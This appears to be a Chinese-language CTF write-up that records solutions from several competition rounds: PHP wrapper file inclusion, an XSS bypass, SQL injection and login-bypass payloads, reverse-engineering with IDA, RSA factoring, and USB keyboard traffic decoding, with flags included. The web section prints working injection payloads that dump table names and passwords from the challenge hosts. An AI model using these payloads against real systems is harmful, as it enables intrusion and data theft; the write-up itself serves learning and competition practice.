统计四场的所有题目(共计12题,四场比赛一共上了21题【包括换题】)
随便记记,以免老题复用(已经复用了)
Web
文件包含 1
伪协议
http://120.202.175.143:8011/?c=php://filter/convert.base64-encode/resource=hhb.php
PD9waHANCmlmIChmbm1hdGNoKCIqaGhiLnBocCoiLCRzdmlkMSkpew0KJHN2aWQ9ICdTVklEW25nNTQycGg5OHd5cjk3ZnF2NGMzcXZnOW5qazU0MjRlZWRdJzsNCn1lbHNlew0KZWNobyAndHJ5o6EnOw0KfQ0KPz4NCg==
base64解码
<?php
if (fnmatch("*hhb.php*",$svid1)){
$svid= 'SVID[ng542ph98wyr97fqv4c3qvg9njk5424eed]';
}else{
echo 'try��';
}
?>
文件包含2
乐,共享靶机,被改 flag 了
快结束的时候光速换题(换成了上面那个文件包含)
data伪协议
?c=data://text/plain,<?php highlight_file("index.php");?>
<?php
if (isset($_GET['c']))
if (!fnmatch ("data*",$_GET['c'])){
echo 'GET c<br>$svid';
} else {
$svid='SVID[nwe9felwh309whec5469089ewfq2cpqr]';
include($_GET['c']);
}
else{
echo 'GET c<br>$svid';
exit;
}
?>
xss_42">xss
Unicode绕过 【xsslab原题吧】
先登录
example:123456
然后输入:
javascript:alert()
点击链接即可
SQL注入
sqlilab原题?
%0a绕过空格过滤
?id=0')uNIOn(sELEct(1),(2),(select(user())));%00
?id=0')union(select(1),2,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()));%00
?id=0')union(select(1),2,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name="users"));%00
?id=0%27)union(select(1),2,(select%0agroup_concat(password)%0afrom%0ausers));%00
http://120.202.175.143:8014/index/?id=0%27)uNIOn(sELEct(1),2,(select%0agroup_concat(title)%0afrom%0aarticle));%00
万能密码1
非预期1: admin:admin直接登录
非预期2:curl http://ip:port/svid.php
预期:(自认为)
尝试常规的万能用户密码,形如admin' or 1=1-- ,密码默认都无效,甚至都没有提示
猜测密码可能被hash加密了,就想到了万能字符串ffifdyop
打开burp进行爆破
http://120.202.175.143:8012/?uname=admin%27%20%23&passwd=ffifdyop
万能密码2
非预期:curl http://ip:port/svid.php
预期:
?uname=like' UNION ALL SELECT CONCAT(1,2),NULL-- -&passwd=like
万能密码3
非预期:curl http://ip:port/svid.php
预期:不知道啊
Reverse
re1
不会 re 的都可以做
文件md5 hash为:9083aceef1a0c7ea36183fde040f721e
ida反编译
unsigned __int64 __fastcall ba(__int64 a1, size_t *a2)
{
size_t i; // [rsp+18h] [rbp-68h]
char v4[20]; // [rsp+2Ch] [rbp-54h] BYREF
char v5[56]; // [rsp+40h] [rbp-40h] BYREF
unsigned __int64 v6; // [rsp+78h] [rbp-8h]
v6 = __readfsqword(0x28u);
strcpy(&v4[6], "djqjnqdwfyl!");
strcpy(v4, "flag{");
pp(v5, v4, &v4[6]);
pp(v5, v5, &unk_2004);
*a2 = strlen(v5);
for ( i = 0LL; i < *a2; ++i )
*(_BYTE *)(a1 + i) = v5[i];
return __readfsqword(0x28u) ^ v6;
}
unk_2004的值为}
ai就给分析出flag了
- strcpy(&v4[6], "djqjnqdwfyl!");:将"djqjnqdwfyl!"复制到v4[6]开始的位置。
- strcpy(v4, "flag{");:将"flag{"复制到v4[0]。
- pp(v5, v4, &v4[6]);:假设pp是某种拼接函数(可能是strcat),将v4("flag{")和&v4[6]("djqjnqdwfyl!")拼接,结果存入v5,即v5 = "flag{djqjnqdwfyl!"。
- pp(v5, v5, &unk_2004);:将v5和某个未知字符串(unk_2004)拼接。
re2
ida反编译看源码
int __cdecl main(int argc, const char **argv, const char **envp)
{
v10 = __readfsqword(0x28u);
qmemcpy(v8, "Q[VPL{QVAz]PC^Z]R_QCH]VR_]NZMVSZ]ORM_[HV[SN^AJ", 46);
v7 = 55;
puts("Welcome to the secret decoder!");
puts("Can you figure out the key to unlock the secret message?");
puts("The message is hidden inside the program...");
for ( i = 0; i <= 999999; ++i )
;
for ( j = 0; *((_BYTE *)v8 + j); ++j )
;
putchar(10);
printf("Enter the decryption key (in hexadecimal): ");
fgets(s, 100, _bss_start);
__isoc99_sscanf(s, "%x", &v4);
if ( v7 == v4 )
{
xor_encrypt_decrypt(v8, v7);
printf("Decrypted: %s\n", (const char *)v8);
}
else
{
puts("Incorrect key. Try again!");
}
return 0;
}
如果输入的v4等于v7,则解密成功
需要输入16进行 (%x)
55的十六进制是0x37,输入37
$ ./bb
Welcome to the secret decoder!
Can you figure out the key to unlock the secret message?
The message is hidden inside the program...
Enter the decryption key (in hexadecimal): 37
Decrypted: flag{LfavMjgtimjehftjaehjymzadmjxezhlaldyiv}
Misc
RSA解密
压缩包里面是一个flag.zip、rsa公钥、密文文件
rsa公钥很短,获取到n可以进行分解
使用RsaCtfTool
$ /opt/RsaCtfTool/RsaCtfTool.py --dumpkey --key rsa_public_key.pem
[!] Using native python functions for math, which is slow. install gmpy2 with: 'python3 -m pip install <module>'.
private argument is not set, the private key will not be displayed, even if recovered.
None
n: 99965623838843374711411183391444104726307314029768628656811347707805304989037
e: 65537
到https://factordb.com/ 分解n得到pq
生成私钥
/opt/RsaCtfTool/RsaCtfTool.py -n 99965623838843374711411183391444104726307314029768628656811347707805304989037 -e 65537 -p 301421686937198008750983790559102741399 -q 331647085034301039007512063728344459163
-----BEGIN RSA PRIVATE KEY-----
MIGqAgEAAiEA3QKJvADgw3sTapG0Bx0KOYVJ+Uy4hfdWtz+fOhShpW0CAwEAAQIg
MzYtWEUTz/gq7ZzJjIRsI62ksoMYL9oST48H90zxqzkCEQDiw7SM9+Zjncud9oGi
q6uXAhEA+YDnu2zTMNUuGGmIUXFnmwIQe7V6hUEkfgnysD1v4Xe4BwIRAJ1GC0zS
sWFjz7WluD8WTCcCEDGBq/10a8U+kL+OpPxp0tM=
-----END RSA PRIVATE KEY-----
使用私钥解密
$ openssl rsautl -decrypt -in venus.en -inkey 1.pem
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
key is 123!@#456
密码是123!@#456
解压压缩包得到flag{78c46c7e7834474f972e3ed44413e27f}
对数据流量进行分析
脚本梭哈
import os
import re
# os.system(r"tshark -r 1.pcapng -T fields -e usbhid.data > usbdata.txt")
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i",
"0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
"16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1",
"1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
"28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[",
"30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
"39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
"40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I",
"0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
"16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!",
"1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
"28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{",
"30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
"39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
"40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
file = r'usbdata.txt'
with open(file, 'r') as file:
contents = file.read().split()
# print(contents)
for cont in contents:
if len(cont) == 16:
# 两个字符 '0000100000000000' => ['00', '00', '10', '00', '00', '00', '00', '00']
a = re.findall('.{2}', cont)
# print(":".join(a))
cont = ":".join(a) # 00:00:10:00:00:00:00:00
try:
# 去除不合条件的
if cont[0] != '0' or (cont[1] != '0' and cont[1] != '2') or cont[3] != '0' or cont[4] != '0' or cont[
9] != '0' or cont[10] != '0' or cont[12] != '0' or cont[13] != '0' or cont[15] != '0' or cont[
16] != '0' or cont[18] != '0' or cont[19] != '0' or cont[21] != '0' or cont[22] != '0' or cont[
6:8] == "00":
continue
if cont[6:8] in normalKeys.keys():
# 没有按 Shift 键
if cont[1] != '2':
output += normalKeys[cont[6:8]]
# print(cont, output)
# 按了 Shift 键
else:
output += shiftKeys[cont[6:8]]
else:
output += "äă" # 随便
except:
pass
print("结果:",output)
flag = ""
for i in range(0, len(output)):
flag += output[i][0]
print(flag)
flag = re.sub("<CAP>(.*?)<CAP>", lambda matchStr: matchStr.group(1).upper(), flag)
# 循环去除 比如 aaaa<DEL><DEL>这种情况 => aa
while re.findall(r".<DEL>", flag, re.DOTALL):
flag = re.sub(r".<DEL>", "", flag, re.DOTALL)
print(flag)
flag需要大写,逆天
flag{A72BD409-B511-472B-A5A0-2F348BC5B9F3}
或者使用ctf-neta梭哈
Crypto
密码的(0解)
现在有一个ctf题目: 小明向网谷杯主办方发送了一条加密信息,并给出了加密代码,遗憾的是,加密代码也被加密了(300分) 密文信息:==DMeOzM6y2p0ZQB3LzpaMUAxOwZ0kTs 加密代码:rgvsm06wIkr06uRuoKYFhipDMTZVpi11dxaycA1vo+FHOPxCbxHdkKDGT5M4dzsONhCYZPfBn7R3dCfpzIxwc5Y8Wp7exB44F69ys0vmqsZ4j+AM2zdWhmg+CctVlXWKFF4phnpgb0UhaV0l1JIAq5+AZ9bwZD6KWXkO9aVTeIbRGemcg1KfSCqCzd1Cjg790YjjWUTb84bM9RQdtlVS932Cg2jfHYwWCQJyB0MOCghQLwYcJryRb+JzJ568c5jwwqTymV4ZJbA1KUIl7KfE3+XjZON4q+nv20tuaXI0FW4Az266/u4a7ORXoKvljJbJFImER/mi0Yb8EuhF3CWLy07kAsYFYT7HHUNT1hGMnmTAVNHmmqXPZoOhnMcdmepJ4NEnXIDE1c0Vif+eZzRKuAxqXOB0Lf9CMQ==
原文
